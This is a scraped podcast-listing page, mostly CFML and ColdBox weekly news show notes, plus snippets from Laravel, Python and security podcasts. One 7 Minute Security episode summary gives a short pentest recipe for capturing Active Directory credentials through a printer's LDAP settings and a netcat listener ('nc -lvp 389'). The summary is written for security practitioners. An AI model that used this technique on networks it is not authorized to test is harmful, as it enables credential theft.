- Ben Nadel - Code Kata: Simple Dependency Injection (DI) With ColdFusionWhen this blog boots-up, I explicitly wire-together all of the ColdFusion components that get cached in memory. The domain model for this blog isn't very big, so configuring the application right in the onApplicationStart() event-handler isn't much of a lift. That said, as a fun code kata - as much as anything else - I wanted to start migrating the configuration over to use more declarative dependencies. To that end, I wanted to build myself a simple dependency injection (DI) container.https://www.bennadel.com/blog/4469-code-kata-simple-dependency-injection-di-with-coldfusion.htm 6/1/23 - Blog - Ben Nadel - The 16th Annual Regular Expression Day - June 1st 2023It's that time of year again! The days are getting longer; the weather is getting nicer; the babies are all being born at the zoo; and, people are going bonkers over the undeniable power of Regular Expression pattern matching! Which must mean, it's Regular Expression Day! This is the time of year in which we take a moment to reflect on how much better off we are having patterns in our lives. And in celebration of that, I'm going to learn something new about using Regular Expressions in JavaScript: named capture groups.https://www.bennadel.com/blog/4471-the-16th-annual-regular-expression-day-june-1st-2023.htm 6/3/23 - Blog - Ben Nadel - Using Nested Locks To Synchronize Background Data Cleanup In ColdFusionAs I'm building out the Dig Deep Fitness MVP, I'm having to implement functionality that I might ordinarily implement in a more robust fashion given better resources (ie, when someone else is paying for the servers). For example, I would normally use Redis to build a one-time token service. But, when writing the same functionality exclusively in ColdFusion, I have to get a little more low-level when implementing the locking (that Redis would normally apply). Specifically, I wanted to think about how to handle locking when I have a background process that needs to clean-up and expunge expired data.https://www.bennadel.com/blog/4472-using-nested-locks-to-synchronize-background-data-cleanup-in-coldfusion.htm 6/5/23 - Tweet - HTMX.org - HTMX threw some shade on Allaire ColdFusion - let's speak up!how many young web developers today can even conceive of a world so based that technology logos could look like this & nobody cringed?people wore this stuff on tee shirts, unembarassed, walking around, living in the moment, high fivingnever forget what they took from youhttps://twitter.com/htmx_org/status/1665728145511657476?s=20.6/6/23 - Blog - Ben Nadel - Building A Magic Link Passwordless Login In ColdFusionAs I build out the Dig Deep Fitness MVP (Minimum Viable Product), I'm trying to do the least amount of work that allows me to start delivering actual value. So, when it comes to user authentication, I didn't want to create a robust account management system. Instead, I ended up building a passwordless login system using magic links. I wanted to share my approach in ColdFusion in case anyone has suggestions on how to improve it or harden it against attacks.https://www.bennadel.com/blog/4473-building-a-magic-link-passwordless-login-in-coldfusion.htm 6/6/23 - Blog - Michael Born - Ortus Solutions - Introducing: The Ortus ORM ExtensionWe are excited to announce the Ortus ORM Extension, a new effort to improve the CFML ecosystem by modernizing Hibernate ORM support on the Lucee CFML server. The Ortus ORM extension is an open-source fork of the Lucee Hibernate extension and is a leap forward in modernizing native support for the Hibernate ORM engine in (Lucee) CFML applications. It also is another addition to our professional open-source offerings, so this extension will be professionally supported under any of our support plans and can also be supported by the community via our Patreon program.https://www.ortussolutions.com/blog/introducing-the-ortus-orm-extension CFML JobsSeveral positions available on https://www.getcfmljobs.com/Listing over 71 ColdFusion positions from 47 companies across 34 locations in 5 Countries.3 new jobs listed this weekFull-Time - ColdFusion Developer at Hyderabad, Telangana - India Company: Purview ServicesPosted Jun 05https://www.getcfmljobs.com/jobs/index.cfm/india/ColdFusion-Developer-at-Hyderabad-Telangana/11579 Full-Time - Application Developer at Lawrence, Kansas - United States Company: Kansas Geological Survey - Kansas UniversityPosted May 27https://www.getcfmljobs.com/jobs/index.cfm/united-states/CFApplicationDev-at-Lawrence-KS/11578 Full-Time - Lucee/ColdFusion Developer at United States - United States Company: BatesvillePosted May 26https://www.getcfmljobs.com/jobs/index.cfm/united-states/LuceeColdFusion-Developer-at-United-States/11577 Other Job Links KGS at Kansas University https://employment.ku.edu/jobs/staff/application-developer/25131br There is a jobs channel in the CFML slack team, and in the Box team slack now too ForgeBox Module of the WeekCBOpenAICBOPENAI is a module that provides a simple API to access OpenAI's variety of AI services. Grant's presentation: https://docs.google.com/presentation/d/1xXlGBs_kNZhrAgS8xxJ4T5NFev2nH4FAaZ3DXYt8wqQ/edit#slide=id.p1 https://www.forgebox.io/view/cbopenai VS Code Hint Tips and Tricks of the WeekVSCODE POWER MODE!!!Power Mode is one of the most requested extensions for VS Code. Unfortunately, they said it couldn't be done...However, after seeing this list and realizing that VS Code was the only modern editor without it, I knew I had to try. I couldn't let VS Code live in the shadow of its big brother or Atom.I present you, VSCODE POWER MODE!!! (now with atom-like explosions and an improved combo meter!)https://github.com/hoovercj/vscode-power-mode Thank you to all of our Patreon SupportersThese individuals are personally supporting our open source initiatives to ensure the great toolings like CommandBox, ForgeBox, ColdBox,  ContentBox, TestBox and all the other boxes keep getting the continuous development they need, and funds the cloud infrastructure at our community relies on like ForgeBox for our Package Management with CommandBox. You can support us on Patreon here https://www.patreon.com/ortussolutionsDon't forget, we have Annual Memberships, pay for the year and save 10% - great for businesses. Bronze Packages and up, now get a ForgeBox Pro and CFCasts subscriptions as a perk for their Patreon Subscription. All Patreon supporters have a Profile badge on the Community Website All Patreon supporters have their own Private Forum access on the Community Website All Patreon supporters have their own Private Channel access BoxTeam Slack https://community.ortussolutions.com/Top Patreons () John Wilson - Synaptrix Tomorrows Guides Jordan Clark Gary Knight Mario Rodrigues Giancarlo Gomez  David Belanger   Dan Card Jeffry McGee - Sunstar Media Dean Maunder Nolan Erck  Abdul Raheen Kevin Wright - Big thanks for Kevin Wright who just made a huge BUMP to their Patreon Pledge Amount And many more PatreonsYou can see an up to date list of all sponsors on Ortus Solutions' Websitehttps://ortussolutions.com/about-us/sponsors Thanks everyone!!! ★ Support this podcast on Patreon ★

AVLEONOV Podcast
Ep.87 - Microsoft Patch Tuesday May 2023: Microsoft Edge, BlackLotus Secure Boot SFB, OLE RCE, Win32k EoP, NFS RCE, PGM RCE, LDAP RCE, SharePoint RCE

AVLEONOV Podcast

Play Episode Listen Later May 28, 2023 8:08


Hello everyone! This episode will be about Microsoft Patch Tuesday for May 2023, including vulnerabilities that were added between April and May Patch Tuesdays. It's been a long time since we've had such tiny Patch Tuesday. 57 CVEs, including CVEs appeared during the month. And only 38 without them!

Modernize or Die ® Podcast - CFML News Edition
Modernize or Die® - CFML News Podcast for May 23rd, 2023 - Episode 196

Modernize or Die ® Podcast - CFML News Edition

Play Episode Listen Later May 23, 2023 73:43


2023-05-23 Weekly News - Episode 196Watch the video version on YouTube at https://youtube.com/live/3F5all2U5Pk?feature=share  Hosts:  Gavin Pickin - Senior Developer at Ortus Solutions Dan Card - Senior Developer at Ortus Solutions Thanks to our Sponsor - Ortus SolutionsThe makers of ColdBox, CommandBox, ForgeBox, TestBox and all your favorite box-es out there. A few ways  to say thanks back to Ortus Solutions: Like and subscribe to our videos on YouTube.  Help ORTUS reach for the Stars - Star and Fork our ReposStar all of your Github Box Dependencies from CommandBox with https://www.forgebox.io/view/commandbox-github  Subscribe to our Podcast on your Podcast Apps and leave us a review Sign up for a free or paid account on CFCasts, which is releasing new content every week BOXLife store: https://www.ortussolutions.com/about-us/shop Buy Ortus's Books 102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips) Learn Modern ColdFusion (CFML) in 100+ Minutes - Free online https://modern-cfml.ortusbooks.com/ or buy an EBook or Paper copy https://www.ortussolutions.com/learn/books/coldfusion-in-100-minutes   Patreon Support (proficient)We have 40 patreons: https://www.patreon.com/ortussolutions. News and AnnouncementsAdobe ColdFusion 2023 released!!!!We are thrilled to announce the highly anticipated release of Adobe ColdFusion 2023!  Packed with cutting-edge features and enhanced performance, this release takes ColdFusion to new heights of innovation.Experience accelerated development, robust security measures, and seamless integration with modern technologies. From rapid application development to scalable enterprise solutions, Adobe ColdFusion empowers developers to build dynamic web applications with ease. Discover the limitless possibilities and stay ahead in the digital era.Upgrade to the latest version now and harness the true potential of ColdFusion. Elevate your coding experience with Adobe ColdFusion – the ultimate platform for unmatched productivity and success. LDAP and SAML integration Central Configuration Server GraphQL client HTML to PDF Cloud Services JWT integration in CF Whats new - https://helpx.adobe.com/coldfusion/using/whats-new.htmlhttps://coldfusion.adobe.com/2023/05/coldfusion2023-release/ ICYMI - Into the Box - Recap Keynote - Day 1 - https://t.co/42DozsZ0G9  Keynote - Day 2 - https://youtube.com/live/TOhOaNVy0dM Sessions Hands on Pre Conference Happy Box Hackathon New Releases and UpdatesLots of Releases So many - we are still waiting on the blogs and release notes for a lot of them, but ITB came with ColdBox7, CommandBox 5.9, Testbox 5, CBWire 3, Testbox CLI, Coldbox CLI, Quick, Qb, CBQ V1 and V2, cbDebugger 3, ContentBox 6 We will discuss some of them belowColdBox 7 ReleasedColdBox 7 has been released!  Install it via ForgeBox using `coldbox`.  Release at ITB 2023!What's New With ColdBox 7.0.0? Engine Support ColdBox CLI WireBox Updates Transient Request Cache Delegators Property Observers Lazy Properties New `onInjectorMissingDependency` event Population Enhancements (including mass assignment protection) Hierarchical Injectors (for Module Dependencies) Module Config Object Override files App Mode Helpers `redirectBack` included as `back` `DateTimeHelper` component Whoops! Upgrades More data for development REST exception responses JSON Pretty Printing in LogBox Output Exception Pretty Printing in LogBox Output Combine `canXXX` checks with logging using callback functions `event.setRequestTimeout()` - useful for testing https://coldbox.ortusbooks.com/v/7.x/intro/release-history/whats-new-with-7.0.0CBWIRE 3.0.0 ReleasedWe are very excited to announce the release of version 3 of CBWIRE, our ColdBox module that makes building modern, reactive apps a breeze. This version brings with it a new component syntax, 19 enhancements and bug fixes, and improved documentation. Our biggest goal with this release was to improve the developer experience and to provide a low barrier to entry to getting started with CBWIRE.https://www.ortussolutions.com/blog/cbwire-300-released  TestBox v5.0.0 Released!We are excited to announce the release of TestBox version 5, which brings a host of new features and improvements for developers. TestBox is a powerful and flexible tool that helps developers write comprehensive BDD/TDD tests for their applications, ensuring code quality and reducing the likelihood of bugs and errors. With TestBox v5, developers can take advantage of new features such as batch code coverage testing, improved reporting capabilities, method spies, and better integration with other tools in the Ortus suite.These new features make TestBox even more versatile and user-friendly, and provide developers with a powerful tool for building high-quality, reliable applications.https://www.ortussolutions.com/blog/testbox-v500-released FusionReactor 10 released, May 18If you're using FusionReactor, note that a new version 10 (10.0.0) released yesterday, May 18. While it's a new major release number, most of the items listed as new aren't really things that you will "see" as changed in the interface. I don't quite want to call it just "plumbing"--the folks had their reason to regard the new and changed features as warranting the major version number increase.https://www.carehart.org/blog/2023/5/19/fusionreactor_10_0_released/https://docs.fusion-reactor.com/release-notes/ ColdBox CLI 1.x ReleasedWe are thrilled to announce the release of our new ColdBox CLI tool! This powerful command-line interface is designed to help developers streamline their workflows and simplify their ColdBox development experience. With its intuitive syntax and powerful capabilities, the ColdBox CLI tool allows developers to easily create, test, and deploy ColdBox applications with just a few simple commands. Whether you are a seasoned ColdBox developer or just getting started with this powerful framework, the ColdBox CLI tool is the perfect addition to your toolkit.This tool used to be embedded in the CommandBox core, but it now has a new home (https://github.com/ColdBox/coldbox-cli) and can have it's own life-cycles including LTS support for our ColdBox Framework as well.https://www.ortussolutions.com/blog/coldbox-cli-1x-releasedICYMI - TestBox CLI 1.x ReleasedWe're excited to unveil our latest **TestBox CLI ** tool! This robust command-line interface is specifically crafted to assist developers in streamlining their workflows and enhancing their TestBox BDD/TDD development process. Boasting an intuitive syntax and potent functionalities, the TestBox CLI tool empowers developers to create, test, and generate reports on their ColdFusion (CFML) applications with ease, using only a handful of commands. Whether you're a seasoned ColdFusion (CFML) developer or a newcomer to this potent framework, the TestBox CLI tool is a valuable asset to add to your toolkit.This tool used to be embedded in the CommandBox core, but it now has a new home (https://github.com/ortus-solutions/testbox-cli) and can have it's own life-cycles.https://www.ortussolutions.com/blog/testbox-cli-1x-releasedNew Ortus Supported ORM Extension for Lucee.Other Releases: cbDedugger 3, ContentBox 6Webinar / Meetups and WorkshopsPOSTPONED - Adobe - Road to Fortuna Series: ColdFusion 2023 in Docker on Google Cloud PlatformMay 23, 2023 - MAYBE IN JUNE10 AM - 11 AM PTDuring GCP centric webinar, Mark Takata will explore how to run a containerized ColdFusion 2023 server on Google Cloud Platform's Kubernetes powered containerization system. He will demonstrate how the powerful new Google Cloud Platform features added to ColdFusion 2023 can help optimize application development, provisioning and delivery. This will be the first time ColdFusion 2023 will be shown running in containers publicly, and the session is designed to showcase the ease of working in this popular method of software delivery.Speaker - Mark Takata - ColdFusion Technical Evangelist, Adobehttps://docker-gcp-coldfusion.meetus.adobeevents.com/ CFCasts Content Updateshttps://www.cfcasts.comRecent Releases 2023 ForgeBox Module of the Week Series - 1 new Video https://cfcasts.com/series/2023-forgebox-modules-of-the-week  2023 VS Code Hint tip and Trick of the Week Series - 1 new Video https://cfcasts.com/series/2023-vs-code-hint-tip-and-trick-of-the-week  Just added 2019 Into the Box Videos Watch sessions from previous ITB years Into the Box 2022 - https://cfcasts.com/series/itb-2022  Into the Box 2021 - https://cfcasts.com/series/into-the-box-2021  Into the Box 2020 - https://cfcasts.com/series/itb-2020  Into the Box 2019 - https://cfcasts.com/series/into-the-box-2019  Coming Soon Into the Box 2023 Videos will soon be available for purchase as an EXCLUSIVE PREMIUM package. Subscribers will get access to premium packages after a 6 month exclusive window. More ForgeBox and VS Code Podcast snippet videos ColdBox Elixir from Eric Getting Started with Inertia.js from Eric 10 Testing Techniques by Dan? Feature Testing Deployment with Docker by Dan? Conferences and TrainingICYMI - Into the Box 2023 - 10th EditionMay 17-19, 2023 The conference will be held in The Woodlands (Houston), Texas - This year we will continue the tradition of training and offering a pre-conference hands-on training day on May 17th and our live Mariachi Band Party! However, we are back to our Spring schedule and beautiful weather in The Woodlands! Also, this 2023 will mark our 10 year anniversary. So we might have two live bands and much more!!!IN PERSON ONLY https://intothebox.orghttps://itb2023.eventbrite.com/ Can't wait? Watch videos from the last 4 years on CFCasts Into the Box 2022 - https://cfcasts.com/series/itb-2022  Into the Box 2021 - https://cfcasts.com/series/into-the-box-2021  Into the Box 2020 - https://cfcasts.com/series/itb-2020  Into the Box 2019 - https://cfcasts.com/series/into-the-box-2019  THIS WEEK - VueConf.usNEW ORLEANS, LA • MAY 24-26, 2023Jazz. Code. Vue.Workshop day: May 24Main Conference: May 25-26https://vueconf.us/ CFCamp - Pre-Conference - Ortus has 4 TrainingsJune 21st, 2023Held at the CFCamp venue at the Marriott Hotel Munich Airport in Freising. Eric - TestBox: Getting started with BDD-TDD Oh My! Luis - Coldbox 7 - from zero to hero Dan - Legacy Code Conversion To The Modern World Brad - CommandBox Server Deployment for the Modern Age https://www.cfcamp.org/pre-conference.html CFCampJune 22-23rd, 2023Marriott Hotel Munich Airport, FreisingCheck out all the great sessions: https://www.cfcamp.org/sessions.htmlCheck out all the great speakers: https://www.cfcamp.org/cfcamp-conference-2023/speakers.html Register now: https://www.cfcamp.org/THAT ConferenceHowdy. We're a full-stack, tech-obsessed community of fun, code-loving humans who share and learn together.We geek-out in Texas and Wisconsin once a year but we host digital events all the time.WISCONSIN DELLS, WI / JULY 24TH - 27TH, 2022A four-day summer camp for developers passionate about learning all things mobile, web, cloud, and technology.https://that.us/events/wi/2023/Our very own Daniel Garcia is speaking there https://that.us/activities/R3eAGT1NfIlAOJd2afY7Adobe CF Summit WestLas Vegas 2-4th of October.Get your early bird passes now. Session passes @ $99 Professional passes @ $199. Only till May 31st, 2023!Can you spot ME - Gavin - Apparently I'm in 3 of the photos!Call for Speakers is OPENhttps://cfsummit.adobeevents.com/ https://cfsummit.adobeevents.com/speaker-application/Ortus Training - ColdBox Zero to HeroDates and VenueMore conferencesNeed more conferences, this site has a huge list of conferences for almost any language/community.https://confs.tech/Blogs, Tweets, and Videos of the Week5/10/23 - Blog - Ben Nadel - Using BugSnag As A Server-Side Logging Service In ColdFusionI've been on the lookout for a better error logging service; and, over on Facebook, Jay Bronson recommended that I look at BugSnag. They have a free-tier, so I signed up to try it out. And, I must say, I'm very pleased with the User Interface (UI) and the basic functionality. That said, I could not get the Java SDK (Software Development Kit) working with JavaLoader. As such, I hacked together some ColdFusion code that would do just enough to send data to the BugSnag API. What I have is far from feature complete; but, I thought it might be worth sharing.https://www.bennadel.com/blog/4462-using-bugsnag-as-a-server-side-logging-service-in-coldfusion.htm 5/11/23 - Blog - Luis Majano - TestBox v5.0.0 Released!We are excited to announce the release of Testbox version 5, which brings a host of new features and improvements for developers. TestBox is a powerful and flexible tool that helps developers write comprehensive BDD/TDD tests for their applications, ensuring code quality and reducing the likelihood of bugs and errors. With TestBox v5, developers can take advantage of new features such as batch code coverage testing, improved reporting capabilities, method spies, and better integration with other tools in the Ortus suite.These new features make TestBox even more versatile and user-friendly, and provide developers with a powerful tool for building high-quality, reliable applications.https://www.ortussolutions.com/blog/testbox-v500-released5/12/23 - Blog - Brian - Why You Don't Want To Use CFMX_COMPAT EncryptionThis is the first of what may be a couple of posts about my presentation from ColdFusion Summit East 2023, which was held in April in Washington, DC.Let's talk about ColdFusion and encryption.  Specifically -- about the CFMX_COMPAT algorithm.  The encrypt() function was introduction in ColdFusion 4 (ca. November 1998), and CFMX_COMPAT was the only algorithm available.  The release of ColdFusion 7 (ca. February 2005) added native support for AES, 3DES, DES, and Blowfish.  But CFMX_COMPAT remains the default algorithm used by the encrypt() function.   https://hoyahaxa.blogspot.com/2023/05/why-you-dont-want-to-use-cfmxcompat.html 5/13/23 - Blog - Nolan Erck - Speaking at Into The Box 2023It's official...next week I'll be speaking at Into The Box in Houston!If you're not already familiar with it, Into The Box is the most modern leaning conference for CFML! But really the CFML-specific portion is complimented by a heavy dose of content that is applicable to many other platforms. A quick look at the agenda will show you sessions ranging from web security, to AWS pub/sub mechanisms, to OAuth and more!https://southofshasta.com/blog/speaking-at-into-the-box-2023/ 5/14/23 - Blog - Ben Nadel - Maintaining White Space Using jSoup And ColdFusionjSoup is a Java library for parsing and manipulating HTML strings. For the last few years, I've been using jSoup to clean-up and normalize my blog posts. And now, I'm looking to use jSoup to help me transform and cache GitHub Gists. At the time of this writing, Gist code is rendered in an HTML with cells that use white-space: pre as the means of controlling white space output. jSoup doesn't parse the CSS; so, it does understand that it needs to maintain this white space when serializing the document back into HTML. If we want to keep this white space in the resultant document, we have to disable pretty printing.https://www.bennadel.com/blog/4463-maintaining-white-space-using-jsoup-and-coldfusion.htm5/16/23 - Blog - Adobe ColdFusion Portal - Introducing the 2023 Release of Adobe ColdFusionWe are thrilled to announce the highly anticipated release of Adobe ColdFusion 2023!  Packed with cutting-edge features and enhanced performance, this release takes ColdFusion to new heights of innovation.https://coldfusion.adobe.com/2023/05/coldfusion2023-release/ 5/16/23 - Blog - Luis Majano - Ortus Solutions - ColdBox 7.0.0 ReleasedIntroducing ColdBox 7: Revolutionizing Web Development with Cutting-Edge Features and Unparalleled PerformanceWe are thrilled to announce the highly anticipated release of ColdBox 7, the latest version of the acclaimed web development HMVC framework for ColdFusion (CFML). ColdBox 7 introduces groundbreaking features and advancements, elevating the development experience to new heights and empowering developers to create exceptional web applications and APIs.Designed to meet the evolving needs of modern web development, ColdBox 7 boasts a range of powerful features that streamline the development process and enhance productivity. With its robust HMVC architecture and developer-friendly tools, ColdBox 7 enables developers to deliver high-performance, scalable, and maintainable web applications and APIs with ease.https://www.ortussolutions.com/blog/coldbox-700-released 5/16/23 - Blog - Ben Nadel - Parsing GitHub Gist Embeds Into A Normalized Data Structure Using jSoup In ColdFusionAs I mentioned yesterday, I've been using GitHub Gists to add the syntax highlighting / formatting in my blog post content. This has been working great; but, I've never liked the idea of having to reach out to a 3rd-party system at render time in order to provide my full content experience. As such, I've been considering ways to cache the GitHub Gist data locally (in my system) for both better control and better performance. Unfortunately, GitHub Gists aren't provided in the most user-friendly format. To that end, we can use jSoup in ColdFusion to read-in, parse, and normalize the Gist contents.https://www.bennadel.com/blog/4464-parsing-github-gist-embeds-into-a-normalized-data-structure-using-jsoup-in-coldfusion.htm 5/16/23 - Blog - Nolan Erck - My Into The Box 2023 ScheduleInto The Box 2023 starts tomorrow! After a flight that included several delay, I finally arrived at the hotel a few minutes ago. As per usual, there is a ton of great content this year; deciding which sessions to attend is like the techie equivalent of Sophie's Choice! Here's my best guess as to where you can find me:Wednesday: Async Programming & Scheduling workshophttps://southofshasta.com/blog/my-into-the-box-2023-schedule/ 5/17/23 - Blog - Charlie Arehart - ColdFusion 2023 released, May 17 2023: resources and thoughtsColdFusion 2023 has been released today, May 17 2023. For more on the many features, see the following several Adobe blog posts and substantial documentation resources they released also today, about which I offer some additional comment below.I also discuss changes in OS support (saving you having to compare the docs discussing that), as well as the change to CF2023 running on Java 17 (which you could miss, as it's not highlighted by Adobe in any of the announcement resources.) I also discuss changes in the licensing document/EULA (again, to save you having to do that comparison), as well as an observation about pricing (it has not changed since CF2021).I also discuss some migration considerations and close by pointing out the Hidden Gems in CF2023 talk that I did, based on the prerelase. I plan to update that in time based on this final release.https://www.carehart.org/blog/2023/5/17/cf2023_released/ 5/18/23 - Blog - Ben Nadel - Using CSS Flexbox To Create A Simple Bar Chart In ColdFusionI'm a huge fan of CSS Flexbox layouts. They're relatively simple to use and there's not much to remember in terms of syntax. One place that I love using Flexbox is when I need to create a simple bar chart. I don't do much charting in my work, so I never have need to pull in large, robust libraries like D3. But, for simple one-off visualizations, CSS Flexbox is my jam. I thought it might be worth sharing a demo of how I do this in ColdFusion.https://www.bennadel.com/blog/4466-using-css-flexbox-to-create-a-simple-bar-chart-in-coldfusion.htm 5/18/23 - Blog - Charlie Arehart - FusionReactor 10 released, May 18: resources and thoughtsIf you're using FusionReactor, note that a new version 10 (10.0.0) released yesterday, May 18. While it's a new major release number, most of the items listed as new aren't really things that you will "see" as changed in the interface. I don't quite want to call it just "plumbing"--the folks had their reason to regard the new and changed features as warranting the major version number increase.For more, read on.Of course, I had just last week blogged on the release of FR 9.2.2, released March 1. I'm not letting as much time pass with this post. :-)https://www.carehart.org/blog/2023/5/19/fusionreactor_10_0_released/5/22/23 - Blog - Grant Copley - CBWIRE 3.0.0 ReleasedWe are very excited to announce the release of version 3 of CBWIRE, our ColdBox module that makes building modern, reactive apps a breeze. This version brings with it a new component syntax, 19 enhancements and bug fixes, and improved documentation. Our biggest goal with this release was to improve the developer experience and to provide a low barrier to entry to getting started with CBWIRE.https://www.ortussolutions.com/blog/cbwire-300-released CFML JobsSeveral positions available on https://www.getcfmljobs.com/Listing over 67 ColdFusion positions from 43 companies across 32 locations in 5 Countries.4 new jobs listed this weekFull-Time - ColdFusion Programmer at Tulsa, OK - United States May 23https://www.getcfmljobs.com/jobs/index.cfm/united-states/ColdFusion-Programmer-at-Tulsa-OK/11575 Full-Time - ColdFusion Engineer at Remote - United States May 21https://www.getcfmljobs.com/jobs/index.cfm/united-states/ColdFusionEngineer-at-Remote/11574 Full-Time - ColdFusion Lead at Pune, Maharashtra - India May 11https://www.getcfmljobs.com/jobs/index.cfm/india/ColdFusion-Lead-at-Pune-Maharashtra/11573 Full-Time - ColdFusion Developer at Pune, Maharashtra - India May 09https://www.getcfmljobs.com/jobs/index.cfm/india/ColdFusion-Developer-at-Pune-Maharashtra/11571 Other Job LinksThere is a jobs channel in the CFML slack team, and in the Box team slack now tooForgeBox Module of the WeekTestBoxTestBox is a Behavior Driven Development (BDD) and Test Driven Development (TDD) framework for ColdFusion (CFML). It also includes mocking and stubbing capabilities via its internal MockBox library.V5 Release NotesWe are excited to announced the release of Testbox version 5, which brings a host of new features and improvements for developers. TestBox is a powerful and flexible tool that helps developers write comprehensive BDD/TDD tests for their applications, ensuring code quality and reducing the likelihood of bugs and errors. With TestBox v5, developers can take advantage of new features such as batch code coverage testing, improved reporting capabilities, method spies, and better integration with other tools in the Ortus suite.These new features make TestBox even more versatile and user-friendly, and provide developers with a powerful tool for building high-quality, reliable applications. You can read more about TestBox in our comprehensive documentation online: https://testbox.ortusbooks.com/ https://www.forgebox.io/view/testbox VS Code Hint Tips and Tricks of the WeekVisual Studio Code Remote - SSH - PreviewBy Microsoft The Remote - SSH extension lets you use any remote machine with a SSH server as your development environment. This can greatly simplify development and troubleshooting in a wide variety of situations. You can:Develop on the same operating system you deploy to or use larger, faster, or more specialized hardware than your local machine.Quickly swap between different, remote development environments and safely make updates without worrying about impacting your local machine.Access an existing development environment from multiple machines or locations.Debug an application running somewhere else such as a customer site or in the cloud.No source code needs to be on your local machine to gain these benefits since the extension runs commands and other extensions directly on the remote machine. You can open any folder on the remote machine and work with it just as you would if the folder were on your own machine.https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-sshWorks well with: Visual Studio Code Remote - SSH: Editing Configuration Fileshttps://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh-edit Thank you to all of our Patreon SupportersThese individuals are personally supporting our open source initiatives to ensure the great toolings like CommandBox, ForgeBox, ColdBox,  ContentBox, TestBox and all the other boxes keep getting the continuous development they need, and funds the cloud infrastructure at our community relies on like ForgeBox for our Package Management with CommandBox. You can support us on Patreon here https://www.patreon.com/ortussolutionsDon't forget, we have Annual Memberships, pay for the year and save 10% - great for businesses. Bronze Packages and up, now get a ForgeBox Pro and CFCasts subscriptions as a perk for their Patreon Subscription. All Patreon supporters have a Profile badge on the Community Website All Patreon supporters have their own Private Forum access on the Community Website All Patreon supporters have their own Private Channel access BoxTeam Slack https://community.ortussolutions.com/Top Patreons (proficient) John Wilson - Synaptrix Tomorrows Guides Jordan Clark Gary Knight Mario Rodrigues Giancarlo Gomez David Belanger  Dan Card Jeffry McGee - Sunstar Media Dean Maunder Nolan Erck  Abdul Raheen And many more PatreonsYou can see an up to date list of all sponsors on Ortus Solutions' Websitehttps://ortussolutions.com/about-us/sponsors Thanks everyone!!! ★ Support this podcast on Patreon ★

7 Minute Security
7MS #572: Protecting Your Domain Controllers with LDAP Firewall

7 Minute Security

Play Episode Listen Later May 19, 2023 26:37


Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.

Laravel News Podcast
Repeating models, extending Raycast, and squeezing lemons

Laravel News Podcast

Play Episode Listen Later May 10, 2023 40:22


Jake and Michael discuss all the latest Laravel releases, tutorials, and happenings in the community.This episode is sponsored by Honeybadger - combining error monitoring, uptime monitoring and check-in monitoring into a single, easy to use platform and making you a DevOps hero. (03:30) - Laravel 10.9 released (10:55) - Use ChatGPT to ask a question to the Laravel docs (14:05) - Create repeatable models with Laravel Recurring Models (16:24) - Laravel Artisan Raycast extension (18:38) - PostgreSQL full text search for Laravel Scout (22:20) - Lemon Squeezy for Laravel (26:55) - Sponsor: Honeybadger (27:54) - LDAP framework for PHP (30:24) - Send toas notifications in your Livewire application with Toaster (31:35) - Small but powerful CLI apps with Minicli

7 Minute Security
7MS #547: Tales of Pentest Pwnage - Part 43

7 Minute Security

Play Episode Listen Later Nov 18, 2022 42:33


This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about tales of pentest pwnage - specifically how much fun printers can be to get Active Directory creds. TLDL: get into a printer interface, adjust the LDAP lookup IP to be your Kali box, run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface in order to (potentially) capture an Active Directory cred! Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.

Python Bytes
#302 The Blue Shirt Episode

Python Bytes

Play Episode Listen Later Sep 20, 2022 33:02


Watch the live stream: Watch on YouTube About the show Sponsored by Microsoft for Startups Founders Hub. Brian #1: Can Amazon's CodeWhisperer write better Python than you? Brian Tarbox “Despite the clickbait-y title, whether CW's code is better or worse than mine is at the margins and not really important. What is significant is that it has the potential to save me a ton of time and mental space to focus on improving, refactoring and testing. It's making me a better programmer by taking on some of the undifferentiated heavy lifting.” Some decent code generation, starting with Amazon API examples. The generated dataclass method was neat, but really, the comment “prompt” probably took as much time to write as the code would have. The generated test case is workable, but I would not consider that a good test. Perhaps don't lump together construction, attribute access, and tests for all methods in one test function. That said, I've seen way worse test methods in my career. So, decent starting point. Related and worth listening to: Changelog #506: Stable Diffusion breaks the internet w/ Simon Willison Mostly an episode about AI generated art. There is a bit of a tie in to AI code generation, the ethics around it, and making sure you walk up the value chain. I'm planning on playing with GitHub CoPilot. I've been reluctant in the past, but Simon's interview is compelling to combine experienced engineering skill with AI code generation to possibly improve productivity. Simon does warn against possible abuse by Junior devs and the “just believe the code” problem that we also see with “copy from StackOverflow” situations. Michael #2: Apache Superset Apache Superset is a modern data exploration and visualization platform An intuitive interface for visualizing datasets and crafting interactive dashboards A wide array of beautiful visualizations to showcase your data Code-free visualization builder to extract and present datasets A world-class SQL IDE for preparing data for visualization, including a rich metadata browser A lightweight semantic layer which empowers data analysts to quickly define custom dimensions and metrics Out-of-the-box support for most SQL-speaking databases Seamless, in-memory asynchronous caching and queries An extensible security model that allows configuration of very intricate rules on who can access which product features and datasets. Integration with major authentication backends (database, OpenID, LDAP, OAuth, REMOTE_USER, etc) The ability to add custom visualization plugins An API for programmatic customization Brian #3: Recipes from Python SQLite docs Redowan Delowar Expanding on sqlite3 Python docs with more examples, including Executing individual and batch statements Applying user-defined callbacks: scalar and aggregate scalar example shows using a sha256 function to hash passwords as their inserted into the database Enabling tracebacks when callbacks raise an error Transforming types between SQLite and Python Implementing authorization control … much more … This is great for not only learning SQLite, but also, since these kinds of topics exist in other databases, learning about databases. AND a great example of learning a subsystem by creating little code snippets to check your understanding of something. One mod I would do in practice is to write these examples as pytest functions, because I can then run them individually while keeping a bunch in the same file.

Streaming Audio: a Confluent podcast about Apache Kafka
Apache Kafka Security Best Practices

Streaming Audio: a Confluent podcast about Apache Kafka

Play Episode Listen Later Aug 11, 2022 39:10 Transcription Available


